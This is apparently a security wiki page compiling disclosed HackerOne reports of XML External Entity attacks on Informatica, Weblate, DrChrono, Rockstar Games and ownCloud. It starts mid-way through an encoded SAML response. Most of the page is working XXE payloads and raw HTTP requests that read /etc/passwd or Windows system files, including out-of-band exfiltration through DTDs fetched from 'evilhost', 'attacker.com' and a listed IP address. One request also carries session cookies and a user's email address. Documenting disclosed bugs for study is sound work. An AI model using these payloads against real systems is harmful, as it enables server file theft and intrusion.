DUwOUNlcnRpZmljYXRlPjwvZHM6WDUwOURhdGE%2BPC9kczpLZXlJbmZvPjwvZHM6U2lnbmF0dXJlPjxzYW1sMnA6U3RhdHVzIHhtbG5zOnNhbWwycD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOnByb3RvY29sIj48c2FtbDJwOlN0YXR1c0NvZGUgVmFsdWU9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpzdGF0dXM6U3VjY2VzcyIvPjwvc2FtbDJwOlN0YXR1cz48c2FtbDI6QXNzZXJ0aW9uIHhtbG5zOnNhbWwyPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXNzZXJ0aW9uIiBJRD0iaWQyOTA5ODg2NzYyNzQ3NjQxMzUwNDEzNDk3MiIgSXNzdWVJbnN0YW50PSIyMDE1LTEyLTI1VDEyOjQ4OjMwLjY3MloiIFZlcnNpb249IjIuMCIgeG1sbnM6eHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIj48c2FtbDI6SXNzdWVyIEZvcm1hdD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOm5hbWVpZC1mb3JtYXQ6ZW50aXR5IiB4bWxuczpzYW1sMj0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydGlvbiI%2BaHR0cDovL3d3dy5va3RhLmNvbS9rd3RiZ2g0akxBWlBNWExRVU5NVTwvc2FtbDI6SXNzdWVyPjxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPjxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BPGRzOlNpZ25hdHVyZU1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhMSIvPjxkczpSZWZlcmVuY2UgVVJJPSIjaWQyOTA5ODg2NzYyNzQ3NjQxMzUwNDEzNDk3MiI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyI%2BPGVjOkluY2x1c2l2ZU5hbWVzcGFjZXMgeG1sbnM6ZWM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIgUHJlZml4TGlzdD0ieHMiLz48L2RzOlRyYW5zZm9ybT48L2RzOlRyYW5zZm9ybXM%2BPGRzOkRpZ2VzdE1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNzaGExIi8%2BPGRzOkRpZ2VzdFZhbHVlPnYzMDhxcFZNZ3k0cTNIVk5BMmgyTmxzREE0OD08L2RzOkRpZ2VzdFZhbHVlPjwvZHM6UmVmZXJlbmNlPjwvZHM6U2lnbmVkSW5mbz48ZHM6U2lnbmF0dXJlVmFsdWU%2BUE5HMUllTXI2MGlkSUkvNFIrcWhSNXFzVUZVM05NYkRzOUFtTzdIZ0U2UFprMFg0VnJlbHJPTjRZeXkwdzY0dUhnQjUvQUpyRTREZ1YyOVV1Vi9NSmg4ZVByK1pRUlpRR09nZFphZTljcGM5VHBYZVRsWVF1T2dleVcyM25HZDRLeHBtK0ZkVU1aaldTY0pYditrYjQrQ2Q5eElmKzRCTDE5MnJ5elBEc1cwPTwvZHM6U2lnbmF0dXJlVmFsdWU%2BPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%2BTUlJQ296Q0NBZ3lnQXdJQkFnSUdBVDN3UmxIdE1BMEdDU3FHU0liM0RRRUJCUVVBTUlHVU1Rc3dDUVlEVlFRR0V3SlZVekVUTUJFRwpBMVVFQ0F3S1EyRnNhV1p2Y201cFlURVdNQlFHQTFVRUJ3d05VMkZ1SUVaeVlXNWphWE5qYnpFTk1Bc0dBMVVFQ2d3RVQydDBZVEVVCk1CSUdBMVVFQ3d3TFUxTlBVSEp2ZG1sa1pYSXhGVEFUQmdOVkJBTU1ER2x1Wm1Gd1lYTnpjRzl5ZERFY01Cb0dDU3FHU0liM0RRRUoKQVJZTmFXNW1iMEJ2YTNSaExtTnZiVEFlRncweE16QTBNRGt4T1RJNE16TmFGdzAwTXpBME1Ea3hPVEk1TXpOYU1JR1VNUXN3Q1FZRApWUVFHRXdKVlV6RVRNQkVHQTFVRUNBd0tRMkZzYVdadmNtNXBZVEVXTUJRR0ExVUVCd3dOVTJGdUlFWnlZVzVqYVhOamJ6RU5NQXNHCkExVUVDZ3dFVDJ0MFlURVVNQklHQTFVRUN3d0xVMU5QVUhKdmRtbGtaWEl4RlRBVEJnTlZCQU1NREdsdVptRndZWE56Y0c5eWRERWMKTUJvR0NTcUdTSWIzRFFFSkFSWU5hVzVtYjBCdmEzUmhMbU52YlRDQm56QU5CZ2txaGtpRzl3MEJBUUVGQUFPQmpRQXdnWWtDZ1lFQQprOFUyUnY1S2lmMzE2aVFkRWVaU25JY3d4amNNRDkzcUpRL1BQbkJDc1A4MDFkbThEOGxxbHBmcHg0Mk82SkxwR0pycSt6UExhZURiCmo1TFJqak9GQjFWR3Z4dEM2eGlpY3o2SXZTS1FVQXFxOCtpL2hsU293SU5zdS9TOWswd0hDaEplVi9tYnBMbVRWeXRRSlYrdVNRM1QKemdjcTNWQzU5VXR2djNFNUJ4OENBd0VBQVRBTkJna3Foa2lHOXcwQkFRVUZBQU9CZ1FBKzBITi9sSkduTWd4SWVwVGJ4LzZqYjNhWQpPNWpyK3IraWFvL1BwL1dlNkxTL2t5MkovdkpGSnZ5TjNMcjBKcFVaeW4zQUZUc3Y4ZFNURmxjeTN2blZBUjdkdnhaY1dHTGlwbzRECm5ZQ3NGNmYvcFgwRDFHSmgyaUZxL3ArK0dqbldIRzZ0Z3ZkUm93akdqVkM3MTFrTy9rUHJIa1ZleDFTNGhlUkxCUVM2Mnc9PTwvZHM6WDUwOUNlcnRpZmljYXRlPjwvZHM6WDUwOURhdGE%2BPC9kczpLZXlJbmZvPjwvZHM6U2lnbmF0dXJlPjxzYW1sMjpTdWJqZWN0IHhtbG5zOnNhbWwyPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXNzZXJ0aW9uIj48c2FtbDI6TmFtZUlEIEZvcm1hdD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6MS4xOm5hbWVpZC1mb3JtYXQ6ZW1haWxBZGRyZXNzIj55YXJiYWJpbkBnbWFpbC5jb208L3NhbWwyOk5hbWVJRD48c2FtbDI6U3ViamVjdENvbmZpcm1hdGlvbiBNZXRob2Q9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpjbTpiZWFyZXIiPjxzYW1sMjpTdWJqZWN0Q29uZmlybWF0aW9uRGF0YSBOb3RPbk9yQWZ0ZXI9IjIwMTUtMTItMjVUMTI6NTM6MzAuNjczWiIgUmVjaXBpZW50PSJodHRwczovL3Jldi1hcHAuaW5mb3JtYXRpY2EuY29tL3NzbyIvPjwvc2FtbDI6U3ViamVjdENvbmZpcm1hdGlvbj48L3NhbWwyOlN1YmplY3Q%2BPHNhbWwyOkNvbmRpdGlvbnMgTm90QmVmb3JlPSIyMDE1LTEyLTI1VDEyOjQzOjMwLjY3M1oiIE5vdE9uT3JBZnRlcj0iMjAxNS0xMi0yNVQxMjo1MzozMC42NzNaIiB4bWxuczpzYW1sMj0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydGlvbiI%2BPHNhbWwyOkF1ZGllbmNlUmVzdHJpY3Rpb24%2BPHNhbWwyOkF1ZGllbmNlPmh0dHBzOi8vcmV2LWFwcC5pbmZvcm1hdGljYS5jb20vc3NvPC9zYW1sMjpBdWRpZW5jZT48L3NhbWwyOkF1ZGllbmNlUmVzdHJpY3Rpb24%2BPC9zYW1sMjpDb25kaXRpb25zPjxzYW1sMjpBdXRoblN0YXRlbWVudCBBdXRobkluc3RhbnQ9IjIwMTUtMTItMjVUMTI6NDg6MzAuNjcyWiIgU2Vzc2lvbkluZGV4PSJpZDE0NTEwNDc3MTA2NzIuNjQ0NjAwMjU2IiB4bWxuczpzYW1sMj0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydGlvbiI%2BPHNhbWwyOkF1dGhuQ29udGV4dD48c2FtbDI6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BdXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFjOmNsYXNzZXM6UGFzc3dvcmRQcm90ZWN0ZWRUcmFuc3BvcnQ8L3NhbWwyOkF1dGhuQ29udGV4dENsYXNzUmVmPjwvc2FtbDI6QXV0aG5Db250ZXh0Pjwvc2FtbDI6QXV0aG5TdGF0ZW1lbnQ%2BPHNhbWwyOkF0dHJpYnV0ZVN0YXRlbWVudCB4bWxuczpzYW1sMj0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydGlvbiI%2BPHNhbWwyOkF0dHJpYnV0ZSBOYW1lPSJSb2xlIiBOYW1lRm9ybWF0PSJucyI%2BPHNhbWwyOkF0dHJpYnV0ZVZhbHVlIHhtbG5zOnhzPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYSIgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0YW5jZSIgeHNpOnR5cGU9InhzOnN0cmluZyI%2BYWxsPC9zYW1sMjpBdHRyaWJ1dGVWYWx1ZT48L3NhbWwyOkF0dHJpYnV0ZT48L3NhbWwyOkF0dHJpYnV0ZVN0YXRlbWVudD48L3NhbWwyOkFzc2VydGlvbj48L3NhbWwycDpSZXNwb25zZT4%3D&RelayState=

Attacker controlled server(95.213.191.87) shows the internal Informatica server(54.149.98.204) reaching out to retrieve XML External Entity:

connect to [95.213.191.87] from ec2-54-149-98-204.us-west-2.compute.amazonaws.com [54.149.98.204] 53883
GET /xxe HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_66
Host: 95.213.191.87
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

Informatica (2)

Informatica disclosed on HackerOne: [marketplace.informatica.com] -...HackerOne

HTTP POST request accepts XML body with XXE payload. I believe the error message is just for the PoC and removing the '1' after "///etc/passwd1" would return the full file.

Payload:

<?xml version="1.0" encoding="UTF-8" standalone="no"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd1" >]> <count> <tabName>profile</tabName> <widgetID>&xxe;</widgetID> <filterType>Only</filterType>

HTTP POST Request with payload:

POST /__services/v2/rest/wall/new/count HTTP/1.1
Host: marketplace.informatica.com
Connection: keep-alive
Content-Length: 249
Accept: application/json, text/javascript, */*
X-J-Token: no-user
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Origin: https://marketplace.informatica.com
Referer: https://marketplace.informatica.com/profile-status-list.jspa?view=wallentry&username=jan-hendrik.huehne@bearingpoint.com
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: jive.server.info="serverName=marketplace.informatica.com:serverPort=443:contextPath=:localName=localhost.localdomain:localPort=9001:localAddr=127.0.0.1"; BIGipServermarketplace-new-int-Pool=958464266.20480.0000; __cdrop=.9IJG7.; __csess=1450347852471.CBUFVZ.; c08ea716-2192-4af0-b0be-eb4589f8bd3c=%7B%22parent_id%22%3A%22%22%2C%22id%22%3A%22kKfiDh-GHos%22%2C%22wom%22%3Afalse%2C%22fb_source%22%3A%22%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; do_mkto_call=true; LastMRH_Session=d922d108; LiveBall=uid=9700856&uky=8BZWQCQN&rid=10286008; MRHSession=4c2087c52f486b2d8fe80461d922d108; s_dmdbase=rsp%3Dmatch%26cData%3D25961098%253ACjsc%2520Mastel%253AAutomotive%253AServices%253A1%2520to%252049%253A0-49%2520milli%253ASMB%253AAutomotive%26cDataCustom%3D%255Bn%2Fa%255D%253A%255Bn%2Fa%255D%253A%255Bn%2Fa%255D%253A%255Bn%2Fa%255D%253AMoscow%253Anull%253ARU%253A7514%26cDataCustom2%3Dnull%253A%255Bn%2Fa%255D%253A%255Bn%2Fa%255D%253A%255Bn%2Fa%255D%253A%255Bn%2Fa%255D%253A%255Bn%2Fa%255D%253A%255Bn%2Fa%255D%253A%255Bn%2Fa%255D%26sentAA%3DT; timeEnd_cookie=1450346443718; wm-ueug=%22yarbabin@gmail.com%22; wm-ag-d={%22st%22:1450435346802%2C%22sc%22:1%2C%22v%22:0%2C%22et%22:1450359167387%2C%22u%22:0}; s_sess=%20s_visitid%3D1450189337951%3B%20v16%3D%3B%20v32%3D%3B%20s_ppvl%3Dwww%25253Aus%25253Aen%25253Aproducts%25253Adata-integration%25253Areal-time-integration%25253Arulepoint-complex-event-processing%252C58%252C58%252C1019%252C1858%252C1019%252C1920%252C1080%252C1%252CP%3B%20s_ppv%3Dwww%25253Aus%25253Aen%25253Aproducts%25253Adata-integration%25253Areal-time-integration%25253Arulepoint-complex-event-processing%252C96%252C46%252C2119%252C1858%252C1019%252C1920%252C1080%252C1%252CP%3B; AMCV_C0B11CFE5330AAFD0A490D45%40AdobeOrg=793872103%7CMCIDTS%7C16794%7CMCMID%7C91737586653844139563863898912439590649%7CMCAID%7CNONE%7CMCAAMLH-1451408130%7C6%7CMCAAMB-1451571056%7Chmk_Lq6TPIBMW925SPhw3Q; JSESSIONID=67E6B255C5D2DAFF90610E94CB8B7D2A.; _ga=GA1.2.1092629952.1450189330; mkt_cookie=known; mbox=PC#1450189325935-186730.26_07#1452186131|check#true#1450976591|session#1450976530070-819656#1450978391; s_vnum=1452773966363%26vn%3D12; s_ppv=-%2C100%2C63%2C1319; __utmt=1; jive.recentHistory.-1=332c3136363137383b31342c323334353b31342c323334373b312c3130343130323b; s_cc=true; gpv_p8=Search; s_nr=1450984732287-Repeat; s_invisit=true; s_sq=informaticamarketplace%252Cinformaticamarketplace2%252Cinformaticacommunity%3D%2526pid%253Dinformatica%252520marketplace%252520community%2526pidt%253D1%2526oid%253Djavascript%25253A%25253B%2526ot%253DA; __utma=151370917.193365317.1450183778.1450970821.1450981714.11; __utmb=151370917.11.10.1450981714; __utmc=151370917; __utmz=151370917.1450981714.11.10.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); _mkto_trk=id:189-ZHZ-794&token:_mch-informatica.com-1450183777729-16344
Content-Type: application/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd1" >]>
<count>
<tabName>profile</tabName>
<widgetID>&xxe;</widgetID>
<filterType>Only</filterType>
</count>

Response below:

JAXBException occurred : /etc/passwd1 (No such file or directory). /etc/passwd1 (No such file or directory).

Informatica (3)

Researcher discovered request that contained JSON body, by changing the HTTP Header content type from 'application/json' to 'application/xml' and converting the JSON to XML, the web server responded with an error message. The researcher was then able to retrieve the /etc/passwd file Out-of-Band.

Original Request Unmodified:

POST /api/rest/mpapi/infaMPAPISearchWebService/query HTTP/1.1
Host: marketplace.informatica.com
Connection: keep-alive
Content-Length: 140
Accept: */*
X-J-Token: no-user
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Origin: https://marketplace.informatica.com
Content-Type: application/json
Referer: https://marketplace.informatica.com/ecmp-helper!troubleLogin.jspa
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4

{"params":{"source":"marketplace","rows":5,"offset":0,"queryParams":{"query":"lol","fieldList":"[\"id\", \"title\"]","sortBy":"relevance"}}}

Modified Request changing content type and converting JSON to XML:

POST /api/rest/mpapi/infaMPAPISearchWebService/query HTTP/1.1
Host: marketplace.informatica.com
Connection: keep-alive
Content-Length: 350
Accept: */*
X-J-Token: no-user
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Origin: https://marketplace.informatica.com
Referer: https://marketplace.informatica.com/ecmp-helper!troubleLogin.jspa
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Content-Type: application/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd1" >]>
<params>
<offset>0</offset>
<queryParams>
<query>&xxe;</query>
<sortBy>relevance</sortBy>
<fieldList>["id", "title"]</fieldList>
</queryParams>
<source>marketplace</source>
<rows>5</rows>
</params>

HTTP Response:

JAXBException occurred : /etc/passwd1 (No such file or directory). /etc/passwd1 (No such file or directory).

Researcher then changed the payload to retrieve the /etc/passwd file through an Out-of-Band vector:

POST /api/rest/mpapi/infaMPAPISearchWebService/query HTTP/1.1
Host: marketplace.informatica.com
Connection: keep-alive
Content-Length: 350
Accept: */*
X-J-Token: no-user
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Origin: https://marketplace.informatica.com
Referer: https://marketplace.informatica.com/ecmp-helper!troubleLogin.jspa
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Content-Type: application/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [
<!ENTITY % b SYSTEM "file:///etc/passwd">
<!ENTITY % asd SYSTEM "http://evilhost/xx.html"> %asd; %rrr;]>
<params>
<offset>0</offset>
<queryParams>
<query>&xxe;</query>
<sortBy>relevance</sortBy>
<fieldList>["id", "title"]</fieldList>
</queryParams>
<source>marketplace</source>
<rows>5</rows>
</params>

The xx.html file contains a payload:

<!ENTITY % c "<!ENTITY % rrr SYSTEM 'ftp://evilhost/%b;'%3E%22%3E%c;

The web server logs show the /etc/passwd file being retrieved to the attacker controlled web server:

Weblate

Weblate disclosed on HackerOne: Uploaded XLF files result in...HackerOne

Researcher discovered that a file upload function is vulnerable to XXE. Quoting the researcher 4cad:

The core of the vulnerability is in how the translate-toolkit processes .XLF files. The XLIFF standard is XML based, and thus supports by default standard XML functionality including external entity execution

The researcher retrieved a standard template file from the application. Then modified the file to contain the two-line payload after the '<?xml' tag and replaced one of the translation texts with '&xxe;'.

Two-line Payload:

<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

The full modified file with the replaced translation text '&xxe;' in line 27:

<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<xliff xmlns="urn:oasis:names:tc:xliff:document:1.1" version="1.1">
  <file original="NoName" source-language="en" datatype="plaintext" target-language="en_GB">
    <body>
      <trans-unit xml:space="preserve" approved="yes" id="main.c:11">
        <source>Hello, world!</source>
        <target state="translated">Hello, world!</target>
      </trans-unit>
      <group restype="x-gettext-plurals" id="main.c:12">
        <trans-unit xml:space="preserve" id="main.c:12[0]">
          <source>Orangutan has %d banana.</source>
          <target></target>
        </trans-unit>
        <trans-unit xml:space="preserve" id="main.c:12[1]">
          <source>Orangutan has %d bananas.</source>
          <target></target>
        </trans-unit>
      </group>
      <trans-unit xml:space="preserve" approved="no" id="main.c:13">
        <source>Try Weblate at &lt;http://demo.weblate.org/&gt;!</source>
        <target state="needs-translation">&lt;script&gt;"alert(1)&lt;/script&gt;</target>
      </trans-unit>
      <trans-unit xml:space="preserve" approved="yes" id="main.c:14">
        <source>Thank you for using Weblate.</source>
        <target state="translated">&xxe;</target>
      </trans-unit>
    </body>
  </file>
</xliff>

Uploading the file, the web server outputs the contents of the /etc/passwd file in the Web UI:

Informatica (4)

Informatica disclosed on HackerOne: [rev-app.informatica.com] - XXEHackerOne

Researcher uploaded file with simple XXE payload that web server processes and outputs the contents of /etc/passwd once the .xlsx file is uploaded.

<!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe PUBLIC "lol" "file:///etc/passwd" >]>

https://www.youtube.com/watch?v=612SgFdOrB0&feature=youtu.bewww.youtube.com

DrChrono

drchrono disclosed on HackerOne: XML Parser Bug: XXE over which...HackerOne

Researcher discovered file upload that accepts XML and with an XXE payload outputs the contents of the /etc/passwd file to the web UI.

The modified XML file contains the payload on lines 1-2 with the '&xxe;' on line 10 within the <suffix> element:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
 <!DOCTYPE html [ <!ELEMENT div ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<?xml-stylesheet type="text/xsl" href="/site_media/ccd_ccr/cda.xsl"?>

<!-- Title: US_Realm_Header_Template -->
<ClinicalDocument xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="urn:hl7-org:v3"
	
	<-- SNIPPED LINES 7-74 FOR BREVITY --> 
						
						<suffix>&xxe;</suffix>

Rockstar Games (ImageMagick SVG)

Rockstar Games disclosed on HackerOne: LFI and SSRF via XXE in...HackerOne

Researcher exploited a SVG to PNG conversion from user supplied input illustrated below, the writeup an exmaple using SMB as well as XIncludes.

Payload:

<!DOCTYPE svg [
<!ENTITY % outside SYSTEM "http://attacker.com/exfil.dtd">
%outside;
]>
<svg>
<defs>
<pattern id="exploit">
  <text x="10" y="10">
    &exfil;
  </text>
</pattern>
</defs>
</svg>

exfil.dtd:

<!ENTITY % data SYSTEM "file:///C:/Windows/system32/drivers/etc/hosts">
<!ENTITY exfil "%data;">

ownCloud

ownCloud disclosed on HackerOne: XXE at host vpn.owncloud.comHackerOne

HTTP POST /user/login improperly parses XML and retrieves XML External Entity from attacker supplied input.

POST /user/login HTTP/1.1
Host: 144.76.105.208
Accept: */*
Content-type: application/xml
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 163

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY % select SYSTEM "http://wallarm.tools/ok">
%select;
]>
<a>wlrm-scnr</a>

Attacker controlled web server logs showing a HTTP GET request for the /ok URL path:

2a01:4f8:192:50d6::2 - - [18/Dec/2015:21:11:47 +0300] "GET /ok HTTP/1.0" 200 227 "-" "-"

PreviousXML External Entity (XXE)NextSource Code Examples

Last updated 4 years ago

Was this helpful?